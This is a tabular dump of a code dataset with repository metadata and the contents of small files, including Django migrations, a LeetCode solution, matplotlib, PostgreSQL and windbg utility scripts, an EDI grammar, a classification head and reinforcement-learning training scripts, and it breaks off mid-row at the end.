blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
599a5100c97cb2e4253e1355234bd786899eb985 | 3bec37b9145af3381f1bbc55745d3ef193694c46 | /presentation/performance/bimodal.py | 965f31acae633b21499c738a90af24fdf56d0dc8 | [] | no_license | nuria/study | c00fa8776514ba4343d9923a9e61af5482d7454c | 57ddbafc762da7c8756b475f016c92bf391bc370 | refs/heads/master | 2023-08-05T01:00:48.923046 | 2023-07-22T14:54:48 | 2023-07-22T14:54:48 | 7,290,586 | 5 | 20 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/local/bin/python
import matplotlib.pyplot as pl
x = [10,10,20,20,20,20,20, 30,30, 30, 30, 40, 40, 60,70, 70, 70, 70, 80, 80, 80, 80, 80, 90, 90, 100]
bins = [10,20,30,40,50,60,70,80,90,100]
pl.hist(x, bins, color=('pink'))
pl.ylim(ymax=6)
pl.title("Test Scores")
pl.xlabel("Score")
pl.show()
| [
"nuria@wikimedia.org"
] | nuria@wikimedia.org |
6cb9fd58900ec505001f59b51e1c295c89baff3d | 6045075c734d65a3cec63d3ae15f8f9f13836559 | /solutions/0077_Combinations/recur_self.py | c534028c6b36b89e0714d0278ffe0c21c214e2c0 | [] | no_license | zh-wang/leetcode | c058470fdf84fb950e3d4f974b27826718942d05 | 6322be072e0f75e2da28b209c1dbb31593e5849f | refs/heads/master | 2021-12-28T02:49:11.964213 | 2021-08-25T06:29:21 | 2021-08-25T06:29:21 | 189,919,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
# combine(n, k) = combine(n-1, i-1) + [i], k <= i <= n
# 1. For the element we pick for combine(n, k),
# we can pick it from k to n, cause we need at least k elements to form the answer.
# (We know that the first, or minimal in sequence order, is 1, 2, ..., k)
# 2. After picker i, the problem falls down to a sub-problem combine(i-1, k-1),
# mean that we need to choose k-1 elements from i-1 values.
if k == 0:
return [[]]
return [pre + [i] for i in range(k, n+1) for pre in self.combine(i-1, k-1)]
| [
"viennakanon@gmail.com"
] | viennakanon@gmail.com |
c9366d2c943f63b4c637c861fa71090d1af49555 | c91d029b59f4e6090a523bf571b3094e09852258 | /src/produto/migrations/0021_produtotamanho_descricao.py | d5cbafd682e15e63f33be66a3c4d365186036266 | [
"MIT"
] | permissive | anselmobd/fo2 | d51b63ebae2541b00af79448ede76b02638c41f0 | 8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab | refs/heads/master | 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 | MIT | 2023-04-21T21:50:46 | 2017-05-30T17:04:27 | Python | UTF-8 | Python | false | false | 503 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2019-04-29 19:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('produto', '0020_produtocor_descricao'),
]
operations = [
migrations.AddField(
model_name='produtotamanho',
name='descricao',
field=models.CharField(default='', max_length=200, verbose_name='descrição'),
),
]
| [
"anselmo.blanco.dominguez+github@gmail.com"
] | anselmo.blanco.dominguez+github@gmail.com |
a522239343b1e09f2c5134b508faa2f98456ebbb | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pandas/_config/config.py | 788bdbb89a23217a4a35e3dbccf570e3d3fa075f | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:947b386607f6b3f78c6e96a0c9aaa85d0fd62af2fb3fc31d67c95cfeec3e83d4
size 22977
| [
"github@cuba12345"
] | github@cuba12345 |
c1e07b3cd70a17a10d69eea452c3c3ded007a6d6 | f620403443b2c0affaed53505c002f35dc68020c | /StreamGeneration/GlobalSortByTime.py | 6ed5583c67de689562fa1d548b710d9c6a8cab7f | [] | no_license | ZhuJiahui/CTMTS | c552b3026deb47879f9aa5bde4b002cf6283858d | 9f8981f6e61900a68a38ae0392e01771beee9651 | refs/heads/master | 2021-01-12T10:18:27.579697 | 2016-12-14T02:23:29 | 2016-12-14T02:23:29 | 76,416,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,066 | py | # -*- coding: utf-8 -*-
'''
Created on 2014年7月22日
@author: ZhuJiahui506
'''
import os
import time
from operator import itemgetter
from TextToolkit import quick_write_list_to_text
def get_time_range(read_directory):
'''
最初时间与最后时间
:param read_directory:
'''
time_series = []
each_time_interval = []
#file_number = sum([len(files) for root, dirs, files in os.walk(read_directory)])
file_list = os.listdir(read_directory)
for i in range(len(file_list)):
print i
f = open(read_directory + '/' + file_list[i], 'rb')
line = f.readline()
this_time_series = []
while line:
this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
time_series.append(this_time)
this_time_series.append(this_time)
line = f.readline()
f.close()
each_time_interval.append([this_time_series[0], this_time_series[-1]])
#升序排序
time_series = sorted(time_series)
start_time = time_series[0]
final_time = time_series[-1]
print "The start time is: %f." % start_time
print "The final time is: %f." % final_time
return start_time, final_time, each_time_interval
def global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory):
print "Begin sorting."
print "May take a long time, Please Wait..."
file_list2 = os.listdir(read_directory)
#start_time = 1388505600 # 2014/01/01 0:00
start_time = int(start_time + 28800) / 86400 * 86400 - 28800
segment_interval = 86400 * 2
file_number = 1
while start_time <= final_time:
this_time_series = []
this_file_texts = []
print "Segment %d ." % file_number
for i in range(len(file_list2)):
if (start_time >= each_time_interval[i][0] and start_time <= each_time_interval[i][1]) or ((start_time + segment_interval) > each_time_interval[i][0] and (start_time + segment_interval) < each_time_interval[i][1]):
f = open(read_directory + '/' + file_list2[i], 'rb')
line = f.readline()
while line:
this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
if this_time < (start_time + segment_interval) and this_time >= start_time:
this_time_series.append(this_time)
this_file_texts.append(line.strip())
elif this_time >= (start_time + segment_interval):
break
else:
pass
line = f.readline()
f.close()
#文本获取完毕按时间排序
tt = zip(this_time_series, this_file_texts)
tt1 = sorted(tt, key = itemgetter(0))
this_file_texts = []
for each in tt1:
this_file_texts.append(each[1])
quick_write_list_to_text(this_file_texts, write_directory + "/" + str(file_number) + ".txt")
file_number = file_number + 1
start_time = start_time + segment_interval
print "Global Sort Complete!!!"
print "Total Segment %d ." % (file_number - 1)
if __name__ == '__main__':
start = time.clock()
now_directory = os.getcwd()
root_directory = os.path.dirname(now_directory) + '/'
read_directory = root_directory + u'dataset/original_data'
write_directory = root_directory + u'dataset/segment'
if (not(os.path.exists(write_directory))):
os.mkdir(write_directory)
start_time, final_time, each_time_interval = get_time_range(read_directory)
global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory)
print 'Total time %f seconds' % (time.clock() - start)
print 'Complete !!!'
| [
"zhujiahui@outlook.com"
] | zhujiahui@outlook.com |
3294126f04d6d5c3ee2390dfc9a57ecb73bc88e2 | 85af4750761974dd406edf614cfe74d0cfc5ba6f | /apps/users/migrations/0003_user_area.py | bd6e8ed903869ceabdc2691194afbe75c7dd7f5f | [] | no_license | Comunidad-de-Programadores/Team-Vue-14-Comfeco-Backend | ebdf9724b6963629c887370d2ddfb7ced072854e | e14856fe6d7b49289cd8cf4bca7e98556ec1ec96 | refs/heads/main | 2023-03-22T00:57:55.189866 | 2021-03-19T13:37:01 | 2021-03-19T13:37:01 | 337,901,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # Generated by Django 3.1.1 on 2021-03-06 05:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20210228_1300'),
]
operations = [
migrations.AddField(
model_name='user',
name='area',
field=models.CharField(choices=[('F', 'Frontend'), ('B', 'Backend'), ('D', 'Devops'), ('V', 'Video Gamer Developer'), ('UIX', 'UI/UX'), ('DB', 'Data Base Developer'), ('CC', 'Cloud Computing')], default='', max_length=255),
preserve_default=False,
),
]
| [
"danielhuamani15@gmail.com"
] | danielhuamani15@gmail.com |
3b4f675e1614fdb5809f39e201751cfadc0e0ad1 | 17248f16c4bf01b9b8257ba4855fb9d747bab100 | /windbgtool/debugger_load_breakpoints.py | 4cf7221dce572d52a6e2a50ec5afb20d89384a52 | [
"MIT"
] | permissive | fengjixuchui/windbgtool | 0d910596ab77c1482fbb8a9c82c381829baaa428 | 9dc759e983043ded2a8de143af24d94a3a4e4862 | refs/heads/master | 2020-08-17T14:57:48.968526 | 2019-10-17T06:02:19 | 2019-10-17T06:02:19 | 215,680,906 | 0 | 0 | MIT | 2019-10-17T06:02:22 | 2019-10-17T01:55:12 | null | UTF-8 | Python | false | false | 980 | py | import sys
import os
import logging
import windbgtool
from optparse import OptionParser, Option
parser = OptionParser(usage="usage: %prog [options] args")
parser.add_option("-b", "--breakpoint_db", dest="breakpoint_db", type="string", default="", metavar="BREAKPOINT_DB",
help="Breakpoint DB filename")
parser.add_option("-l", "--log", dest="log", type="string", default="", metavar="LOG", help="Log filename")
(options, args) = parser.parse_args(sys.argv)
root_dir = os.path.dirname(sys.argv[-3])
if options.breakpoint_db == '':
options.breakpoint_db = os.path.join(root_dir, 'bp.db')
if options.log == '':
options.log = os.path.join(root_dir, time.strftime("Record-%Y%m%d-%H%M%S.db"))
logging.basicConfig(level=logging.DEBUG)
root = logging.getLogger()
windbgtoolRun = windbgtool.Run()
# windbgtoolRun.SetSymbolPath()
if options.breakpoint_db:
windbgtoolRun.LoadBreakPoints(options.breakpoint_db, options.log)
windbgtoolRun.Continue()
| [
"oh.jeongwook@gmail.com"
] | oh.jeongwook@gmail.com |
5a98ae5a045a32ec3241b0ba03fe150df8ed8e90 | d5d7b0773d312545a0b36f72d119a3feae3c200b | /manage.py | 1d906eb32601e4c1065a1be1dd03f8f36f891566 | [] | no_license | princ3raj/advanceBlogApp | 0e23812a5ff27ad5bf2238422073a5ab45d4ae0a | ebed84f2899773cd15fb66f515f9f5787307056a | refs/heads/master | 2023-06-11T02:57:19.954941 | 2021-06-16T13:09:40 | 2021-06-16T13:09:40 | 298,969,263 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'advanceBlogApp.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"princ3raj1999@gmail.com"
] | princ3raj1999@gmail.com |
3a014455f400edcae05b46b534a82c2f547fa079 | be69a4f0093561a38449d717112ce94a7616e505 | /joulescope_ui/test/test_config.py | 1e346c9eba7c0754e605af629da6bbe677ae6325 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | adam-urbanczyk/pyjoulescope_ui | b0692178f4b4257427e97ce8e67b79279d6e04ba | fe5475c8d75b980b63dc3ec6d14f7de99e33efc1 | refs/heads/master | 2020-06-17T09:21:12.496697 | 2019-07-02T14:57:18 | 2019-07-02T14:57:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,596 | py | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the configuration file
"""
import unittest
import os
import io
import tempfile
import shutil
from joulescope_ui.config import load_config_def, load_config, save_config
MYPATH = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.dirname(MYPATH)
def load_def():
path = os.path.join(PATH, 'config_def.json5')
return load_config_def(path)
class TestConfig(unittest.TestCase):
def test_load_config_def(self):
d = load_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_load_config_def_default(self):
d = load_config_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_file_not_found(self):
d = load_def()
c = load_config(d, '/path/to/nothing.json5')
self.assertIn('General', c)
self.assertIn('data_path', c['General'])
self.assertNotEqual('__APP_PATH__', c['General']['data_path'])
self.assertIn('Device', c)
self.assertIn('i_range', c['Device'])
self.assertEqual('auto', c['Device']['i_range'])
def test_load_filehandle(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': 'auto'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_bad_option(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '__invalid__'}}""".encode('utf-8'))
with self.assertRaises(ValueError):
c = load_config(d, f)
def test_load_default(self):
d = load_def()
f = io.BytesIO("""{'Device': {}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_alias(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '2'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('180 mA', c['Device']['i_range'])
def test_filename(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c = load_config(d, fname)
self.assertEqual('180 mA', c['Device']['i_range'])
class TestConfigSave(unittest.TestCase):
def setUp(self):
self._tempdir = tempfile.mkdtemp()
self._filename1 = os.path.join(self._tempdir, 'joulescope_config.json5')
def tearDown(self):
shutil.rmtree(self._tempdir)
def test_load_save_load_path(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
save_config(c1, self._filename1)
c2 = load_config(d, self._filename1)
self.assertEqual(c1, c2)
def test_load_save_load_filehandle(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
with open(self._filename1, 'w') as f:
save_config(c1, f)
with open(self._filename1, 'r') as f:
c2 = load_config(d, f)
self.assertEqual(c1, c2)
| [
"matt.liberty@jetperch.com"
] | matt.liberty@jetperch.com |
684aa470a21d1d3d0dabc09d2afaf2008ecf134c | eb56b01d5900db238bd94fc0283866575e37d8b5 | /aerobot/migrations/0014_delete_gallery.py | e5ee851484617a7b80075a25af3b3a77990afd64 | [] | no_license | prathmesh2048/Aerobots-Website | 43220db29a89edda059a34f8b7e3c14657103a4e | 9c11a5777b770df7aa4f8aec16e7c61f25419c0a | refs/heads/master | 2023-03-07T06:24:43.308905 | 2021-02-22T08:51:58 | 2021-02-22T08:51:58 | 292,319,707 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # Generated by Django 3.1 on 2020-09-03 10:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('aerobot', '0013_remove_gallery_link'),
]
operations = [
migrations.DeleteModel(
name='Gallery',
),
]
| [
"prathmeshnandurkar123@gmail.com"
] | prathmeshnandurkar123@gmail.com |
41ed640797d8b39a7645ff460aec3b52decb2d9d | 14a1c405bb1fe6fc7b5ccf4d6b8a2d042309ce93 | /tests/test_github_com.py | a41c327a607414f6008fddac4bec79d69c44f431 | [
"MIT"
] | permissive | the-dan/import_from_github_com | f067efd57edce46d83857101516188d5b6ce778d | 8fdd185b73835f637bb3e789d15e1ce13ff8f5cb | refs/heads/master | 2022-12-07T21:37:44.645946 | 2020-08-22T14:27:15 | 2020-08-22T14:27:15 | 288,563,107 | 0 | 0 | MIT | 2020-08-18T20:58:28 | 2020-08-18T20:58:27 | null | UTF-8 | Python | false | false | 284 | py | def test_import_module():
from github_com.kennethreitz import requests
assert requests.get('https://github.com').status_code == 200
def test_import_from_module():
from github_com.kennethreitz.requests import get
assert get('https://github.com').status_code == 200
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
d61d98030e8ca3ecbdbfec6fe7148c08a55779ed | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/5020/999005020.py | f972b49f11a222801df1d8cfa147f11ba02906ea | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 674 | py | from bots.botsconfig import *
from records005020 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'FA',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'AK1', MIN: 1, MAX: 1},
{ID: 'AK2', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'IK3', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
{ID: 'IK4', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
]},
]},
{ID: 'IK5', MIN: 1, MAX: 1},
]},
{ID: 'AK9', MIN: 1, MAX: 1},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
bdaeffeb33e535244e7fc70fc8248c8c9842f951 | f4663fe7fb660b62cca0c17bfd4c568bbc5bfb49 | /UNO-R3/examples/test_led.py | 485d9c10bf2ad38162d41e7e56ca6cc2675b1b70 | [] | no_license | mchobby/pyboard-driver | 274f0f90e895bdf6f80c27a716788e5a444c24d3 | 3fd45b81588d00479bf55d3dc7ea0ece3cb170de | refs/heads/master | 2023-04-26T14:27:11.323019 | 2023-04-13T21:37:50 | 2023-04-13T21:37:50 | 63,084,841 | 12 | 10 | null | 2022-11-27T19:35:00 | 2016-07-11T16:37:00 | Python | UTF-8 | Python | false | false | 430 | py | # Test the Neopixel present on the PYBOARD-UNO-R3 board
#
from uno import pixels
from time import sleep
led = pixels() # just one LED
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
led.fill( red )
led.write()
sleep(1)
led.fill( green )
led.write()
sleep(1)
led.fill( blue )
led.write()
sleep(1)
led.fill( (255,0,255) ) # Magenta
led.write()
sleep(1)
led.fill( (0,0,0) ) # Black
led.write()
print("That's all Folks!")
| [
"info@mchobby.be"
] | info@mchobby.be |
640aef9894f039267aba382904d3941646e285ee | f34dc191304f0c54527948aa7b7123fd6efe85b9 | /insert.py | cda7d978b6b817a7d459a0f2974143bf3c9060a9 | [] | no_license | sujith1919/groza | b3fc4641de48423da9a219c33e390ea2c4915687 | 5b68e052266d5307a0058d7031b3b20c4a1b9bcb | refs/heads/master | 2023-02-28T03:09:51.568592 | 2021-02-02T16:34:49 | 2021-02-02T16:34:49 | 335,353,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | #!/usr/bin/python
import psycopg2
from config import config
def connect():
""" Connect to the PostgreSQL database server """
conn = None
try:
# read connection parameters
params = config()
# connect to the PostgreSQL server
print('Connecting to the PostgreSQL database...')
conn = psycopg2.connect(**params)
# create a cursor
cur = conn.cursor()
# execute a statement
print('PostgreSQL database version:')
cur.execute('SELECT version()')
db_version1 = cur.fetchone()
print(db_version1)
# display the PostgreSQL database server version
cur.execute('SELECT * from LIFEBOAT')
db_version2 = cur.fetchone()
print(db_version2)
#cur.fetchall()
# close the communication with the PostgreSQL
#cur.execute("INSERT INTO LIFEBOAT (flag,hostname, nagios_status, dr_hostname, host_type) VALUES ('0','st13p29im-lifeboat002.me.com','staging','mr21p30im-lifeboat002.me.com','lifeboat')" )
#conn.commit()
cur.execute("SELECT * FROM LIFEBOAT where hostname='st13p29im-lifeboat033.me.com'")
cur.fetchall()
if cur.rowcount == 1:
cur.execute("UPDATE LIFEBOAT SET nagios_status=%s, kernel_version=%s where hostname='st13p29im-lifeboat033.me.com'" ,('staging','4.1.12-124.14.2.el6uek'))
conn.commit()
else:
print("insert")
cur.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
print('Database connection closed.')
if __name__ == '__main__':
connect()
| [
"jayarajan.sujith@oracle.com"
] | jayarajan.sujith@oracle.com |
43fd9e035ebf49370ede93a58cceb5a1a2df58a2 | 1c91439673c898c2219ee63750ea05ff847faee1 | /mmcls/models/heads/multi_label_linear_head.py | 0e9d0684a1b4aff4fa92ba807e550a4de98a6949 | [
"Apache-2.0"
] | permissive | ChenhongyiYang/GPViT | d7ba7f00d5139a989a999664ab0874c5c9d53d4d | 2b8882b2da41d4e175fe49a33fcefad1423216f4 | refs/heads/main | 2023-06-08T00:10:07.319078 | 2023-05-26T15:52:54 | 2023-05-26T15:52:54 | 577,075,781 | 78 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | # Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
from ..builder import HEADS
from .multi_label_head import MultiLabelClsHead
@HEADS.register_module()
class MultiLabelLinearClsHead(MultiLabelClsHead):
"""Linear classification head for multilabel task.
Args:
num_classes (int): Number of categories.
in_channels (int): Number of channels in the input feature map.
loss (dict): Config of classification loss.
init_cfg (dict | optional): The extra init config of layers.
Defaults to use dict(type='Normal', layer='Linear', std=0.01).
"""
def __init__(self,
num_classes,
in_channels,
loss=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
reduction='mean',
loss_weight=1.0),
init_cfg=dict(type='Normal', layer='Linear', std=0.01)):
super(MultiLabelLinearClsHead, self).__init__(
loss=loss, init_cfg=init_cfg)
if num_classes <= 0:
raise ValueError(
f'num_classes={num_classes} must be a positive integer')
self.in_channels = in_channels
self.num_classes = num_classes
self.fc = nn.Linear(self.in_channels, self.num_classes)
def pre_logits(self, x):
if isinstance(x, tuple):
x = x[-1]
return x
def forward_train(self, x, gt_label, **kwargs):
x = self.pre_logits(x)
gt_label = gt_label.type_as(x)
cls_score = self.fc(x)
losses = self.loss(cls_score, gt_label, **kwargs)
return losses
def simple_test(self, x, sigmoid=True, post_process=True):
"""Inference without augmentation.
Args:
x (tuple[Tensor]): The input features.
Multi-stage inputs are acceptable but only the last stage will
be used to classify. The shape of every item should be
``(num_samples, in_channels)``.
sigmoid (bool): Whether to sigmoid the classification score.
post_process (bool): Whether to do post processing the
inference results. It will convert the output to a list.
Returns:
Tensor | list: The inference results.
- If no post processing, the output is a tensor with shape
``(num_samples, num_classes)``.
- If post processing, the output is a multi-dimentional list of
float and the dimensions are ``(num_samples, num_classes)``.
"""
x = self.pre_logits(x)
cls_score = self.fc(x)
if sigmoid:
pred = torch.sigmoid(cls_score) if cls_score is not None else None
else:
pred = cls_score
if post_process:
return self.post_process(pred)
else:
return pred
| [
"chenhongyiyang@Chenhongyis-MacBook-Pro.local"
] | chenhongyiyang@Chenhongyis-MacBook-Pro.local |
d945fc30415b316e05bee88c5573d829ba4719b9 | 084a13b6524e21914826e842eeefefd09570a970 | /experiments/procgen_exploration/jumper/ppo_cnd_2_0.py | 9ac4ad7392e37ae8846941d8fc80871f8484960a | [
"MIT"
] | permissive | michalnand/reinforcement_learning | 28aa0e2c92b6112cf366eff0e0d6a78b9a56e94f | 01635014a37a4c871766b4cdd2caaa26a0c2d8cc | refs/heads/main | 2023-06-01T10:27:36.601631 | 2023-02-12T19:46:01 | 2023-02-12T19:46:01 | 217,841,101 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | import time
import torch
import RLAgents
import models.ppo_cnd_2_0.src.model_ppo as ModelPPO
import models.ppo_cnd_2_0.src.model_cnd_target as ModelCNDTarget
import models.ppo_cnd_2_0.src.model_cnd as ModelCND
import models.ppo_cnd_2_0.src.config as Config
#torch.cuda.set_device("cuda:1")
path = "models/ppo_cnd_2_0/"
config = Config.Config()
#config.envs_count = 1
envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExploration, config.envs_count)
#envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExplorationRender, config.envs_count)
agent = RLAgents.AgentPPOCND(envs, ModelPPO, ModelCNDTarget, ModelCND, config)
max_iterations = 500000
trainig = RLAgents.TrainingIterations(envs, agent, max_iterations, path, 128)
trainig.run()
'''
agent.load(path)
agent.disable_training()
episodes = 0
total_score = 0.0
reward_sum = 0.0
while True:
reward, done, info = agent.main()
#envs.render(0)
#agent.render(0)
reward_sum+= reward
if done:
episodes+= 1
total_score+= reward_sum
reward_sum = 0
print("DONE ", episodes, total_score/episodes)
''' | [
"michal.nand@gmail.com"
] | michal.nand@gmail.com |
498922c4b2af734bee8adc81ca0627c2f25b46c0 | f719ec76a8417fc05a2d46ada2501052e2bf9469 | /dicg/torch/baselines/__init__.py | 8d90ef326b8eee216b97735a1d2efda2c656eaca | [] | no_license | yang-xy20/DICG | cc31064a3e4a3dd01414161e42b228c2c09bfea7 | c64ba9dbbe0f2b745cd04ce516aa1fed4c2cffc7 | refs/heads/master | 2023-07-04T18:25:18.461196 | 2021-08-19T21:34:06 | 2021-08-19T21:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from dicg.torch.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from dicg.torch.baselines.dicg_critic import DICGCritic
from dicg.torch.baselines.attention_mlp_critic import AttentionMLPCritic
__all__ = [
'GaussianMLPBaseline',
'DICGCritic',
'AttentionMLPCritic',
] | [
"lisheng@stanford.edu"
] | lisheng@stanford.edu |
dd0b358353cfac1a73baa1e7653032b942731d2a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03479/s081451690.py | 2d434d0c722ffcf0dc82c9e9c3c1e7001d970560 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | X,Y = map(int,input().split())
ans = 0
for i in range(Y):
if X <= Y:
ans += 1
X *= 2
else:
break
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
eccc336a352e0d802ed588afb9de41f3723494d3 | ac82f56dc4c7cb6b370d51c0779113a981ef3f01 | /intermol/forces/lj_sigeps_nonbonded_type.py | b06a03a785faa4b02f7e13d431a7dec2ac915d29 | [
"MIT"
] | permissive | ctk3b/InterMol | d1e8a53efedcd180ba6e3d5cf80788defae478fb | 5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d | refs/heads/master | 2020-04-04T20:47:41.012740 | 2017-03-12T20:51:01 | 2017-03-12T20:51:01 | 40,187,082 | 0 | 0 | null | 2015-08-04T13:42:12 | 2015-08-04T13:42:11 | null | UTF-8 | Python | false | false | 1,302 | py | import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_nonbonded_type import AbstractNonbondedType
class LjSigepsNonbondedType(AbstractNonbondedType):
__slots__ = ['sigma', 'epsilon', 'type']
@accepts_compatible_units(None, None,
sigma=units.nanometers,
epsilon=units.kilojoules_per_mole,
type=None)
def __init__(self, bondingtype1, bondingtype2,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
AbstractNonbondedType.__init__(self, bondingtype1, bondingtype2, type)
self.sigma = sigma
self.epsilon = epsilon
class LjSigepsNonbonded(LjSigepsNonbondedType):
"""
stub documentation
"""
def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
self.atom1 = atom1
self.atom2 = atom2
LjSigepsNonbondedType.__init__(self, bondingtype1, bondingtype2,
sigma=sigma,
epsilon=epsilon,
type=type) | [
"christoph.t.klein@me.com"
] | christoph.t.klein@me.com |
65973df5fe958ef43d875007d011cb487127b30f | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Algorithms/Beautiful Strings/solution.py | 33a4185d9020a23110d3f259c0ff305bdb2dd595 | [
"MIT"
